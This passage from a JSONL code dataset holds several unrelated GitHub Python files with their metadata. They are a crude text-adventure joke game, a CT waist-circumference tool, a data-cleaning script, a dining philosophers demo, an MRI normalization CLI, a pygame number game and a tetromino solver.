str:\n\t\tsleep(0.03)\n\t\tsys.stdout.write(char)\n\t\tsys.stdout.flush()\n\ndef text():\n\tloading(\"Loading........................................\")\n\timport time\n\t\n\tsleep(.5)\n\tname=raw_input(\"\\nGLERB GLBO\\n\")\n\n\tsleep(.3)\n\n\ttypewrite(\"\\n gleep gloop loop {}\".format(name))\n\n\n\tsleep(.3)\n\n\ttypewrite(\"\\nYou notice the tree you fell from has two doors on it a left and a right door \\nthey both lead to a fjlarp\\n\")\n\tsleep(1)\n\ndef blue1():\n\ttypewrite(\"You join the blue team and they hand you a freaking hotdog...\\n dont worry its a braught worst lfmao gg m8\")\n\ttypewrite(\"\\nYou just stand there and have no idea whats going on buts thats ok\\nThen sum Butt head runs at you with a hamster FIRMLy Griped in his hands\\n looks like he is on memes \\n the dank kind\")\n\ndef red1():\n\ttypewrite(\"you go into the red arean hoping to find team8s\\nbut there is only hamsters\\nyout think atleast\\ndont forget you have been drugges m8 pirtay m9\")\n\ttypewrite(\"\\nYou pick up your Pepe sword and grab a handfull of magic beans charlie\\n Then You 
find a golden ticket\\n YOU STARat TO SPRINT AT THIS BRO WHO LOOKS DUMB AND SMELLS LIKE CHEESE haha SOML lol!\")\n\ndef bail1():\n\ttypewrite(\"You leave Your HOT wife... DUMB BUMB WANTS GUM right get it ? no you don't\\n frekign beta noob\")\n\ndef stay1():\n\ttypewrite(\"\\nYou and Your Hunnie Pop Go to coounsling and try to work tings out....\\n but it gets so boring that you starting taking coaine to spice things up a little bit\\n get it SPICE things up haha jk jk\")\n\ndef left1():\n\ttypewrite(\"The gold ball will make you able to eat allot of pizza and not got sick\\nbruhhh You get into a ship\")#next question i have to mentin that the ball is laced with lcd\n\ndef left0():\n\ttypewrite(\"You walk into a smelly hotdog.\\nThe dog locks behind you.\")\n\ttypewrite(\"You see some Lcd and you snort that meme\\n\")\n\ttypewrite(\"SPoiler It turns out your in the hugner games and you got druged... BEata noob\\n Blue OR RED TEAM??????\")\n\tq6 = raw_input(\"\\nBlue or Red\\n\").lower()\n\tif q6 == \"blue\":\n\t\tblue1()\n\telif q6 == \"red\":\n\t\tred1()\n\ndef right1():\n\ttypewrite(\"SILVER BALL GIVS YOU POWERS YOU marry THE HOT CHICK GLEEP LOOP LOPOOPO\")\n\tsilver1()\n\t\ndef rightquestion1():\n\tq4 = raw_input(\"Silver or Gold\\n\").lower()\n\tif q4 == \"silver\":\n\t\tright1()\n\telif q4 ==\"gold\":\n\t\tleft1()\n\trightquestion1()\n\ndef right0():\n\tsleep(1)\n\ttypewrite(\"you play jker with a ladie gllop\\n\")\n\ttypewrite(\"There is a golden ping pong ball \")\n\ttypewrite(\"and a silver ping pong ball\\n\")\n\trightquestion1()\ndef silver1():\n\ttypewrite(\"\\n Ten YEARS LATER\\n You and flearjk Are having RElationship Issuies That is a no goo my friend\\n Will you try to Stay and Work it out OR BAIL\\n\")\n\tq5 = raw_input(\"Stay or Bail\\n\").lower()\n\tif q5 == \"stay\":\n\t\tstay1()\n\telif q5 == \"bail\":\n\t\tbail1()\n\ndef main():\n\ttext()\n\tq3 = raw_input(\"Left or Right\\n\").lower()\n\tif q3 == \"left\":\n\t\tleft0()\n\telif q3 == \"right\":\n\t\tright0()\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n\n\n\n","repo_name":"sporttickets/EliteMormons","sub_path":"madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72809507368","text":"import argparse\n\nimport pandas as pd\nimport numpy as np\nimport os\nfrom matplotlib.pyplot import imshow, imsave\nfrom dicomseries import DicomSeries\nfrom utilities import (\n get_binary_body,\n fill_binary_gaps,\n mark_body,\n measure_circumference,\n detect_number_of_bones,\n get_waist_range,\n select_waist_measurement\n)\n\n# This is a sample Python script.\nparser = argparse.ArgumentParser(description='Automatically Calculate Waist Circumference from CT Scan')\nparser.add_argument('-i', '--input', help='Input DICOM Series Directory', required=True)\nparser.add_argument('-o', '--output', help='Output CSV File Directory', required=True)\nparser.add_argument('-t', '--threshold', help='Bone Area Threshold to filter number of bones', required=False,\n default=100)\nargs = parser.parse_args()\n\n\ndef main():\n # Create a DicomSeries object\n dicom_series = DicomSeries(args.input)\n # Read the DicomSeries object at an HU where bone is easily visible\n ct_scan = dicom_series.read_dicom_series('*', 0, 500)\n try:\n if ct_scan.shape[2] < 10 or dicom_series.series_info['ct_direction'] != 'AX':\n print('Invalid CT Scan')\n return\n except KeyError:\n print('Invalid CT Scan')\n return\n outdir = 
f'{args.output}/{dicom_series.mrn}'\n # Create the output directory if it does not exist\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n # Make the base name of the output file\n description = f'MRN{dicom_series.mrn}_ACC{dicom_series.acc}_{dicom_series.cut}_waist_circumferences'\n # Create dictionary to store the results\n waist_circumferences = {}\n # For each cut, binarize the image, fill the gaps, measure the circumference, and get number of bones\n for image in range(ct_scan.shape[2]):\n image_slc = ct_scan[:, :, image]\n binary_im = get_binary_body(image_slc)\n binary_im = fill_binary_gaps(binary_im)\n body_array = mark_body(binary_im)\n measurement = measure_circumference(body_array, dicom_series.series_info['width'])\n n_bones = detect_number_of_bones(image_slc, upper_bound=225, area_threshold=int(args.threshold))\n waist_circumferences[image] = {'waist_circumference_cm': measurement, 'n_bones': n_bones}\n # Write the results to a CSV file\n df = pd.DataFrame(waist_circumferences).T\n df.to_csv(f'{outdir}/{description}.csv')\n # Select the waist measurement from the CSV file\n max_ix, waist_range = get_waist_range(df)\n waist_center, waist_ix, = select_waist_measurement(df, max_ix, waist_range)\n if waist_ix is None:\n print('No waist measurement found')\n return\n # Store the data around the waist to calculate the mean and standard deviation\n try:\n five_measure = df.loc[(waist_ix - 2):(waist_ix + 2), 'waist_circumference_cm']\n except Exception:\n print('5 index out of range for comparison')\n five_measure = None\n try:\n fifteen_measure = df.loc[(waist_ix - 8):(waist_ix + 8), 'waist_circumference_cm']\n except Exception:\n print('15 index out of range for comparison')\n fifteen_measure = None\n important_vals = [\n str(dicom_series.mrn),\n dicom_series.series_info['scan_date'],\n waist_ix,\n waist_center\n ]\n if five_measure is not None:\n important_vals.append(five_measure.mean())\n important_vals.append(five_measure.std())\n else:\n important_vals.append(None)\n important_vals.append(None)\n if fifteen_measure is not None:\n important_vals.append(fifteen_measure.mean())\n important_vals.append(fifteen_measure.std())\n else:\n important_vals.append(None)\n important_vals.append(None)\n # Write the important values to a CSV file\n fig = imshow(ct_scan[:, :, waist_ix])\n imsave(f'{outdir}/{description}.png', fig.get_array())\n pd.DataFrame([important_vals],\n columns=['MRN', 'ScanDate', 'WaistIndex', 'WaistCenter', '5-Mean', '5-Std', '15-Mean',\n '15-Std']).to_csv(f'{outdir}/{description}_measurement.csv', index=False)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"idinsmore1/waistCircumference","sub_path":"waistCircumference/calculate_waist_circumference.py","file_name":"calculate_waist_circumference.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21187931581","text":"import pandas as pd\nfrom datetime import timedelta\n\npd.set_option('display.max_columns', 10)\n\npath_accident_data = 'data/raw/US_Accidents_Dec21_updated.csv'\npath_weather_data = 'data/raw/WeatherEvents_Jan2016-Dec2021.csv'\npath_gdp_data = 'data/raw/SAGDP2N__ALL_AREAS_1997_2020.csv'\npath_employment_data = 'data/raw/CAEMP25N__ALL_AREAS_2001_2019.csv'\n\nmapping_state_path = 'data/cleaned/mapping/mapping_pop_state.csv'\n\npath_output_accident_data = 'data/cleaned/data_accident_2016_2021.csv'\npath_output_weather_data = 'data/cleaned/data_weather_2016_2021.csv'\npath_output_gdp_data = 
'data/cleaned/data_gdp_2015_2020.csv'\npath_output_employment_data = 'data/cleaned/data_employment_2015_2019.csv'\n\n\ndef import_raw_data(path_accident_data, path_weather_data, path_gdp_data, path_employment_data):\n df_acc = pd.read_csv(path_accident_data)\n df_wea = pd.read_csv(path_weather_data)\n df_gdp = pd.read_csv(path_gdp_data)\n df_emp = pd.read_csv(path_employment_data, encoding='ISO-8859-1')\n return df_acc, df_wea, df_gdp, df_emp\n\n\ndef aggregate_accident_data(df_acc):\n \"\"\"\n Get year, month of each accident from Start_Time attribute\n Aggregate by year, month, state, zipcode, severity of accidents\n map 'state' column'\n \"\"\"\n df_acc['year'] = pd.to_datetime(df_acc['Start_Time']).dt.year\n df_acc['month'] = pd.to_datetime(df_acc['Start_Time']).dt.month\n df_acc['Zipcode'] = df_acc['Zipcode'].str[:5]\n\n df_acc_agg = df_acc.groupby(['year', 'month', 'State', 'Zipcode', 'Severity'], group_keys=False)[\n 'ID'].count().reset_index()\n df_acc_agg.columns = ['year', 'month', 'postal_abbr', 'zipcode', 'severity', 'count_accidents']\n\n df_mapping_state = pd.read_csv(mapping_state_path)\n df_acc_agg = df_acc_agg.merge(df_mapping_state, how='left', on='postal_abbr')\n\n return df_acc_agg[['year', 'month', 'state_code', 'state', 'postal_abbr', 'zipcode', 'severity', 'count_accidents']]\n\n\ndef aggregate_weather_data(df_wea):\n \"\"\"\n Get day, month, year of each record from StartTime attribute\n Aggregate by year, month, zipcode, state, event type, and severity of events\n Count the duration (in days) for the specific events by year/month/zipcode/state using the unique count of days\n map 'state' column\n \"\"\"\n df_wea['start_time'] = pd.to_datetime(df_wea['StartTime(UTC)'])\n df_wea['end_time'] = pd.to_datetime(df_wea['EndTime(UTC)'])\n df_wea['year'] = df_wea['start_time'].dt.year\n df_wea['month'] = df_wea['start_time'].dt.month\n df_wea['day'] = df_wea['start_time'].dt.day\n\n df_wea_agg = df_wea.groupby(['year', 'month', 'State', 'ZipCode', 'Type', 'Severity'])[\n 'day'].nunique().reset_index()\n df_wea_agg.columns = ['year', 'month', 'postal_abbr', 'zipcode', 'event_type', 'severity', 'duration_days']\n\n df_mapping_state = pd.read_csv(mapping_state_path)\n df_wea_agg = df_wea_agg.merge(df_mapping_state, how='left', on='postal_abbr')\n\n return df_wea_agg[['year', 'month', 'state_code', 'state', 'postal_abbr', 'zipcode', 'event_type', 'severity', 'duration_days']]\n\n\ndef aggregate_gdp_data(df_gdp):\n \"\"\"\n flatten number of GDP for each year (columns) to rows & map 'state' column\n Aggregate by year, state, and industry of GDP\n \"\"\"\n start_year, end_year = 2015, 2019\n\n # filtering industries\n col_include_linecode = [3, 6, 10, 11, 12, 34, 35, 36, 45, 50, 59, 68, 75, 82, 83]\n df_gdp = df_gdp[df_gdp['LineCode'].isin(col_include_linecode)]\n\n # mapping new industry names\n mapping_industry = {\n 3: 'agriculture',\n 6: 'mining',\n 10: 'utilities',\n 11: 'construction',\n 12: 'manufacturing',\n 34: 'wholesale_trade',\n 35: 'retail_trade',\n 36: 'transportation',\n 45: 'information',\n 50: 'finance',\n 59: 'services',\n 68: 'education',\n 75: 'entertainment',\n 82: 'others',\n 83: 'government'\n }\n df_gdp['industry'] = df_gdp['LineCode'].map(mapping_industry)\n\n df_gdp_melt = pd.melt(df_gdp, id_vars=['GeoName', 'industry'],\n value_vars=[str(yr) for yr in range(start_year, end_year + 1)], \\\n var_name='year', value_name='gdp_millions')\n # df_gdp_melt['Description'] = df_gdp_melt['Description'].str.strip()\n\n df_gdp_melt.columns = ['state', 'industry', 
'year', 'gdp_millions']\n\n df_mapping_state = pd.read_csv(mapping_state_path)\n df_gdp_melt = df_gdp_melt.merge(df_mapping_state, how='inner', on='state')\n\n return df_gdp_melt[['year', 'state_code', 'state', 'postal_abbr', 'industry', 'gdp_millions']]\n\n\ndef aggregate_employment_data(df_emp):\n \"\"\"\n flatten number of employment for each year (columns) to rows & map 'state' column\n Aggregate by year, state, and industry of employment\n \"\"\"\n start_year, end_year = 2015, 2019\n\n # filtering industries\n col_include_linecode = [70, 100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1600, 1700, 1800, 1900, 2001, 2002, 2010]\n df_emp = df_emp[df_emp['LineCode'].isin(col_include_linecode)]\n\n # mapping new industry names\n mapping_industry = {\n 70: 'farm',\n 100: 'forestry',\n 200: 'mining',\n 300: 'utilities',\n 400: 'construction',\n 500: 'manufacturing',\n 600: 'wholesale_trade',\n 700: 'retail_trade',\n 800: 'transportation',\n 900: 'information',\n 1000: 'finance',\n 1100: 'real_estate',\n 1200: 'professional',\n 1300: 'management',\n 1400: 'administrative_support',\n 1500: 'education',\n 1600: 'healthcare',\n 1700: 'entertainment',\n 1800: 'accommodation_food',\n 1900: 'others',\n 2001: 'federal_civilian',\n 2002: 'military',\n 2010: 'state_local'\n }\n df_emp['industry'] = df_emp['LineCode'].map(mapping_industry)\n\n df_emp_melt = pd.melt(df_emp, id_vars=['GeoName', 'industry'],\n value_vars=[str(yr) for yr in range(start_year, end_year + 1)], \\\n var_name='year', value_name='num_employment')\n\n # df_emp_melt['Description'] = df_emp_melt['Description'].str.strip()\n df_emp_melt.columns = ['state', 'industry', 'year', 'num_employment']\n\n df_mapping_state = pd.read_csv(mapping_state_path)\n df_emp_melt = df_emp_melt.merge(df_mapping_state, how='inner', on='state')\n\n return df_emp_melt[['year', 'state_code', 'state', 'postal_abbr', 'industry', 'num_employment']]\n\n\ndef write_to_csv(df_list, path_list):\n assert len(df_list) == len(path_list), 'different dataframe and output path lengths'\n for i in range(len(df_list)):\n df_list[i].to_csv(path_list[i], index=False)\n\n\nif __name__ == '__main__':\n df_acc, df_wea, df_gdp, df_emp = import_raw_data(path_accident_data, path_weather_data, path_gdp_data, path_employment_data)\n\n\n df_acc_agg = aggregate_accident_data(df_acc)\n df_wea_agg = aggregate_weather_data(df_wea)\n df_gdp_agg = aggregate_gdp_data(df_gdp)\n df_emp_agg = aggregate_employment_data(df_emp)\n\n df_list = [df_acc_agg, df_wea_agg, df_gdp_agg, df_emp_agg]\n path_list = [path_output_accident_data, path_output_weather_data, path_output_gdp_data, path_output_employment_data]\n\n write_to_csv(df_list, path_list)\n\n\n\n\n\n\n\n\n\n","repo_name":"bvorapoom/usc_apds","sub_path":"551_Data Management/Project/cleanData.py","file_name":"cleanData.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8711178958","text":"import threading\r\nimport random\r\nimport time\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\nclass Philosopher(threading.Thread):\r\n running = True\r\n\r\n # ---------------------------------------------------------------------------\r\n def __init__(self, xname, chopStickLeft, chopStickRight):\r\n threading.Thread.__init__(self)\r\n self.name = xname\r\n self.chopStickLeft = chopStickLeft\r\n self.chopStickRight = chopStickRight\r\n\r\n # 
------------------------------------------------------------------------------\r\n def run(self):\r\n while self.running:\r\n time.sleep(random.uniform(3, 15))\r\n print('%s want to eat a meal.' % self.name)\r\n self.dine()\r\n\r\n # -----------------------------------------------------------------------------------\r\n def dine(self):\r\n chopStick1, chopStick2 = self.chopStickLeft, self.chopStickRight\r\n\r\n while self.running:\r\n chopStick1.acquire(True)\r\n locked = chopStick2.acquire(False)\r\n if locked: break\r\n chopStick1.release()\r\n print('%s exchange chopsticks' % self.name)\r\n chopStick1, chopStick2 = chopStick2, chopStick1\r\n else:\r\n return\r\n\r\n self.dining()\r\n chopStick2.release()\r\n chopStick1.release()\r\n\r\n # -------------------------------------------------------------------------------\r\n def dining(self):\r\n print('%s start to eat meal ' % self.name)\r\n time.sleep(random.uniform(1, 10))\r\n print('%s finishes eat meal && thinking.' % self.name)\r\n # ---------------------------------------------------------------------------------\r\n\r\n\r\ndef PhilosophersDiningTime():\r\n chopSticks = [threading.Lock() for n in range(7)]\r\n philosopherNames = ('Nietzsche', 'Averroes', 'Ambrose', 'Damascius', 'Galilei', 'Gorgias', 'Iamblichus')\r\n\r\n philosophers = [Philosopher(philosopherNames[i], chopSticks[i % 7], chopSticks[(i + 1) % 7]) \\\r\n for i in range(7)]\r\n\r\n random.seed(507129)\r\n Philosopher.running = True\r\n for p in philosophers: p.start()\r\n time.sleep(100)\r\n Philosopher.running = False\r\n print(\"One round going to finish\")\r\n\r\n\r\n# ----------------------------------------------------------------------------------------------------------------------\r\nPhilosophersDiningTime()\r\n","repo_name":"b00m13/Dining_Philosophers","sub_path":"Nijat_Alammadov_Philosophers.py","file_name":"Nijat_Alammadov_Philosophers.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71589378728","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nintensity_normalization.exec.zscore_normalize\n\ncommand line executable for Z-score intensity normalization routine\n\nAuthor: Jacob Reinhold (jacob.reinhold@jhu.edu)\n\nCreated on: May 30, 2018\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport warnings\n\nwith warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=FutureWarning)\n from intensity_normalization.errors import NormalizationError\n from intensity_normalization.normalize import zscore\n from intensity_normalization.utilities import io\n\n\ndef arg_parser():\n parser = argparse.ArgumentParser(description='Normalize image intensity by subtracting the mean '\n 'and dividing by the standard deviation of the whole brain')\n required = parser.add_argument_group('Required')\n required.add_argument('-i', '--image', type=str, required=True,\n help='path to a directory of/single nifti MR image of the brain')\n required.add_argument('-o', '--output-dir', type=str, default=None,\n help='path to output normalized images '\n '(default: to directory containing images)')\n\n options = parser.add_argument_group('Options')\n options.add_argument('-m', '--brain-mask', type=str, default=None,\n help='path to a directory of/single nifti brain mask for the image')\n options.add_argument('-s', '--single-img', action='store_true', default=False,\n help='image and mask 
are individual images, not directories')\n options.add_argument('-p', '--plot-hist', action='store_true', default=False,\n help='plot the histograms of the normalized images, save it in the output directory')\n options.add_argument('-v', '--verbosity', action=\"count\", default=0,\n help=\"increase output verbosity (e.g., -vv is more than -v)\")\n return parser\n\n\ndef process(image_fn, brain_mask_fn, output_dir, logger):\n img = io.open_nii(image_fn)\n dirname, base, _ = io.split_filename(image_fn)\n if output_dir is not None:\n dirname = output_dir\n if not os.path.exists(dirname):\n logger.info('Making output directory: {}'.format(dirname))\n os.mkdir(dirname)\n if brain_mask_fn is None:\n mask = None\n else:\n if brain_mask_fn == 'nomask':\n mask = 'nomask'\n else:\n mask = io.open_nii(brain_mask_fn)\n normalized = zscore.zscore_normalize(img, mask)\n outfile = os.path.join(dirname, base + '_zscore.nii.gz')\n logger.info('Normalized image saved: {}'.format(outfile))\n io.save_nii(normalized, outfile, is_nii=True)\n\n\ndef main(args=None):\n args = arg_parser().parse_args(args)\n if args.verbosity == 1:\n level = logging.getLevelName('INFO')\n elif args.verbosity >= 2:\n level = logging.getLevelName('DEBUG')\n else:\n level = logging.getLevelName('WARNING')\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=level)\n logger = logging.getLogger(__name__)\n try:\n if not args.single_img:\n if not os.path.isdir(args.image):\n raise NormalizationError('if single-img option off, then image must be a directory')\n img_fns = io.glob_nii(args.image)\n if args.brain_mask is None:\n mask_fns = [None] * len(img_fns)\n else:\n if os.path.isdir(args.brain_mask):\n mask_fns = io.glob_nii(args.brain_mask)\n else:\n logger.info('whole image z-score normalization enabled')\n mask_fns = ['nomask'] * len(img_fns)\n if len(img_fns) != len(mask_fns) and len(img_fns) > 0:\n raise NormalizationError('input images and masks must be in correspondence and greater than zero '\n '({:d} != {:d})'.format(len(img_fns), len(mask_fns)))\n\n for i, (img, mask) in enumerate(zip(img_fns, mask_fns), 1):\n logger.info('Normalizing image {} ({:d}/{:d})'.format(img, i, len(img_fns)))\n dirname, base, _ = io.split_filename(img)\n if args.output_dir is not None:\n dirname = args.output_dir\n process(img, mask, dirname, logger)\n\n else:\n if not os.path.isfile(args.image):\n raise NormalizationError('if single-img option on, then image must be a file')\n logger.info('Normalizing image {}'.format(args.image))\n dirname, base, _ = io.split_filename(args.image)\n process(args.image, args.brain_mask, dirname, logger)\n\n if args.plot_hist:\n with warnings.catch_warnings():\n warnings.filterwarnings('ignore', category=FutureWarning)\n from intensity_normalization.plot.hist import all_hists\n import matplotlib.pyplot as plt\n bm = args.brain_mask if args.brain_mask is None else \\\n args.brain_mask if os.path.isdir(args.brain_mask) else None\n ax = all_hists(args.output_dir, bm)\n ax.set_title('Z-Score')\n plt.savefig(os.path.join(args.output_dir, 'hist.png'))\n\n return 0\n except Exception as e:\n logger.exception(e)\n return 1\n\n\nif __name__ == '__main__':\n 
sys.exit(main(sys.argv[1:]))\n","repo_name":"HaoLi12345/skull_stripping","sub_path":"AGS/src/pre_processing/intensity_normalization_github/intensity_normalization/exec/zscore_normalize.py","file_name":"zscore_normalize.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23928557385","text":"import pygame\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 600,))\nGame_running = True\n\n# BackGround Img\nbackground = pygame.image.load(\"wooden_background_board_65898_800x600 222.jpg\")\n\n# Title and icon\npygame.display.set_caption(\"100 Game\")\nicon = pygame.image.load(\"number-blocks.png\")\npygame.display.set_icon(icon)\n\n# Digit One 1 !\noneImg = pygame.image.load(\"one (1).png\")\noneX = 150\noneY = 50\noneX_change = 0\n\n\ndef Digit_One(x, y):\n screen.blit(oneImg, (x, y))\n\n\n# Digit Two !\ntwoImg = pygame.image.load(\"two.png\")\ntwoX = 250\ntwoY = 50\n\n\ndef Digit_Two(x, y):\n screen.blit(twoImg, (x, y))\n\n\n# Digit Three !\nthreeImg = pygame.image.load(\"three.png\")\nthreeX = 350\nthreeY = 50\n\n\ndef Digit_Three(x, y):\n screen.blit(threeImg, (x, y))\n\n\n# Digit Four !\nfourImg = pygame.image.load(\"four.png\")\nfourX = 450\nfourY = 50\n\n\ndef Digit_Four(x, y):\n screen.blit(fourImg, (x, y))\n\n\n# Digit Five !\nfiveImg = pygame.image.load(\"five.png\")\nfiveX = 550\nfiveY = 50\n\n\ndef Digit_Five(x, y):\n screen.blit(fiveImg, (x, y))\n\n\n# Digit Six !\nsixImg = pygame.image.load(\"six.png\")\nsixX = 150\nsixY = 120\n\n\ndef Digit_Six(x, y):\n screen.blit(sixImg, (x, y))\n\n\n# Digit seven !\nsevenImg = pygame.image.load(\"seven.png\")\nsevenX = 250\nsevenY = 120\n\n\ndef Digit_Seven(x, y):\n screen.blit(sevenImg, (x, y))\n\n\n# Digit Eight !\neightImg = pygame.image.load(\"eight.png\")\neightX = 350\neightY = 120\n\n\ndef Digit_Eight(x, y):\n screen.blit(eightImg, (x, y))\n\n\n# Digit Nine !\nnineImg = pygame.image.load(\"nine.png\")\nnineX = 450\nnineY = 120\n\n\ndef Digit_Nine(x, y):\n screen.blit(nineImg, (x, y))\n\n\ndef instructors():\n instructors_text = pygame.font.Font('OpenSans-Bold.ttf', 20)\n text = instructors_text.render(\"Input numbers using the keyboard, whoever reaches 100 wins : \", True, (0,0, 0))\n screen.blit(text, (5, 250))\n\n\n\n\n# Displaying the score_value\nscore_value = 0\nscore_text = pygame.font.Font('yankclipper2.ttf', 44)\nscoreX = 350\nscoreY = 450\n\n\ndef show_score(x, y):\n game = score_text.render(\"Current score: \" + str(score_value), True, (255, 0, 0))\n screen.blit(game, (x, y))\n\n\n# Displaying the player Turn\ncurrent_player = \"Player_One\"\nturns = pygame.font.Font('yankclipper2.ttf', 44)\nturnsX = 0\nturnsY = 350\n\n\ndef player_turn(x, y):\n turn = score_text.render(\"Current Turn: \" + str(current_player), True, (255, 0, 0))\n screen.blit(turn, (x, y))\n\n\ndef Winner():\n global Game_running\n background_new = pygame.image.load(\"Game over.jpg\")\n if current_player == \"Player_Two\" and score_value == 100:\n winner_text = pygame.font.Font('yankclipper2.ttf', 50)\n winner = winner_text.render(\"Player One Wins !! \", True, (255, 0, 0))\n screen.blit(background_new, (0, 0))\n screen.blit(winner, (275, 290))\n Game_running = False\n if current_player == \"Player_One\" and score_value == 100:\n winner_text = pygame.font.Font('yankclipper2.ttf', 50)\n winner = winner_text.render(\"Player Two Wins !! 
\", True, (255, 0, 0))\n screen.blit(background_new, (0, 0))\n screen.blit(winner, (275, 290))\n Game_running = False\n # Checking for Draw\n if score_value > 100:\n winner_text = pygame.font.Font('yankclipper2.ttf', 50)\n winner = winner_text.render(\"Draw!!\", True, (255, 0, 0))\n screen.blit(background_new, (0, 0))\n screen.blit(winner, (350, 290))\n Game_running = False\n\n\nwhile True:\n screen.fill((255, 255, 255))\n\n mX, mY = pygame.mouse.get_pos()\n\n # Keyboard Events !\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT: # checkinng if the user close the program\n exit()\n # Keyboard inputs !\n if Game_running == True:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_1:\n # 1 moves to 2\n a = oneX\n b = oneY\n oneX = twoX\n oneY = twoY\n twoY = b\n twoX = a\n score_value = score_value + 1\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_2:\n\n # 2 moves to 6\n c = twoX\n d = twoY\n twoX = sixX\n twoY = sixY\n sixX = c\n sixY = d\n\n score_value = score_value + 2\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_3:\n\n # 3 moves to 7\n e = threeX\n f = threeY\n threeX = sevenX\n threeY = sevenY\n sevenX = e\n sevenY = f\n\n score_value = score_value + 3\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_4:\n\n # 4 moves to 9\n g = fourX\n h = fourY\n\n fourX = nineX\n fourY = nineY\n\n nineX = g\n nineY = h\n\n score_value = score_value + 4\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_5:\n # 5 moves to 8\n i = fiveX\n g = fiveY\n fiveX = eightX\n fiveY = eightY\n eightX = i\n eightY = g\n score_value = score_value + 5\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_6:\n # six moves to nine\n j = sixX\n k = sixY\n sixX = nineX\n sixY = nineY\n nineX = j\n nineY = k\n score_value = score_value + 6\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_7:\n # 7 moves to 4\n l = sevenX\n m = sevenY\n sevenX = fourX\n sevenY = fourY\n fourX = l\n fourY = m\n score_value = score_value + 7\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_8:\n # 8 moves to 1\n n = eightX\n o = eightY\n eightX = oneX\n eightY = oneY\n oneX = n\n oneY = o\n score_value = score_value + 8\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n if event.key == pygame.K_9:\n # 9 moves to 5\n p = nineX\n q = nineY\n nineX = fiveX\n nineY = fiveY\n fiveX = p\n fiveY = q\n\n score_value = score_value + 9\n if current_player == \"Player_One\":\n current_player = \"Player_Two\"\n else:\n current_player = \"Player_One\"\n\n screen.blit(background, (0, 0))\n Digit_One(oneX, oneY)\n Digit_Two(twoX, twoY)\n Digit_Three(threeX, threeY)\n Digit_Four(fourX, fourY)\n Digit_Five(fiveX, fiveY)\n Digit_Six(sixX, sixY)\n Digit_Seven(sevenX, sevenY)\n Digit_Eight(eightX, eightY)\n Digit_Nine(nineX, nineY)\n show_score(scoreX, scoreY)\n player_turn(turnsX, turnsY)\n instructors()\n Winner()\n\n 
pygame.display.update()\n","repo_name":"OmarGaafar1/100-Game.py","sub_path":"The 100 Game/The 100 Game GUI.py","file_name":"The 100 Game GUI.py","file_ext":"py","file_size_in_byte":8722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18251791203","text":"import sys\n\ninput = sys.stdin.readline\n\nshape_one = [[1, 1, 1, 1]]\nshape_two = [[1, 1], [1, 1]]\nshape_three = [[1, 1, 1], [0, 1, 0]]\nshape_four = [[1, 0], [1, 0], [1, 1]]\nshape_five = [[1, 0], [1, 1], [0, 1]]\nshape_six = [[0, 1], [0, 1], [1, 1]]\nshape_seven = [[0, 1], [1, 1], [1, 0]]\nshapes = [shape_one, shape_two, shape_three, shape_four, shape_five, shape_six, shape_seven]\n\n\ndef brute(N: int, M: int, r: int, c: int, board: list) -> int:\n max_size = 0\n for i, shape in enumerate(shapes):\n for _ in range(4):\n size = 0\n shape = list(zip(*shape[::-1]))\n for sr in range(len(shape)):\n for sc in range(len(shape[0])):\n nr, nc = r + sr, c + sc\n if 0 <= nr < N and 0 <= nc < M:\n size += (board[nr][nc] * shape[sr][sc])\n else:\n size = 0\n break\n if size == 0:\n break\n max_size = max(size, max_size)\n\n return max_size\n\ndef solve(N: int, M: int, board: list) -> None:\n answer = 0\n for r in range(N):\n for c in range(M):\n answer = max(answer, brute(N, M, r, c, board))\n print(answer)\n\n\nif __name__ == '__main__':\n N, M = map(int, input().split())\n board = [list(map(int, input().split())) for _ in range(N)]\n solve(N, M, board)\n\n # tetrominos = [[[0, 1], [0, 2], [0, 3]],\n # [[1, 0], [2, 0], [3, 0]],\n # [[0, 1], [1, 0], [1, 1]],\n # [[1, 0], [2, 0], [2, 1]],\n # [[1, 0], [1, -1], [1, -2]],\n # [[0, 1], [1, 1], [2, 1]],\n # [[0, 1], [0, 2], [1, 0]],\n # [[1, 0], [1, 1], [2, 1]],\n # [[0, 1], [1, 0], [1, -1]],\n # [[0, 1], [0, 2], [1, 